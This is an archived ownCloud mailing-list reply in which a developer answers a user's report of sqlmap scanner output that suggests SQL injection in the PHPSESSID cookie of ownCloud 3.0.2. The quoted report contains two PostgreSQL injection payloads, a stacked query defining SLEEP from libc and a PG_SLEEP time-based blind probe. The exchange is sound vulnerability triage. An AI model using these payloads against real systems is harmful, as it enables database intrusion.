[Owncloud] This is the actual vulnerability?
Frank Karlitschek
frank at owncloud.org
Sun May 6 21:30:26 UTC 2012
Hi Saymon,
I´m not sure I understood completely what this output means. It seems to be a problem with the handling of the sessionid which is handled by php itself. So this could be a php problem and not related to owncloud. But we don´t store the session in the database so I don´t fully understand the connection here.
Can you send me all the information you have here and how to reproduce this output in a private email?
Thanks a lot.
Frank
On 06.05.2012, at 12:41, saymon <saymon at hub21.ru> wrote:
> Hi all.
> We decided to check my owncloud different scanners security. When
> testing sqlmap faced with the following:
>
> sqlmap identified the following injection points with a total of 16640
> HTTP(s) requests:
> ---
> Place: Cookie
> Parameter: PHPSESSID
> Type: stacked queries
> Title: PostgreSQL < 8.2 stacked queries (Glibc)
> Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))); CREATE OR REPLACE
> FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C'
> STRICT; SELECT sleep(5);-- AND ((("JEUt"="JEUt
>
> Type: AND/OR time-based blind
> Title: PostgreSQL > 8.1 AND time-based blind
> Payload: PHPSESSID=ispocimq3ns4o9r7ak2u0a6ak0"))) AND 1939=(SELECT
> 1939 FROM PG_SLEEP(5)) AND ((("YsVe"="YsVe
> ---
> This is the actual vulnerability? ownCloud v3.0.2
>
> _______________________________________________
> Owncloud mailing list
> Owncloud at kde.org
> https://mail.kde.org/mailman/listinfo/owncloud
More information about the Owncloud
mailing list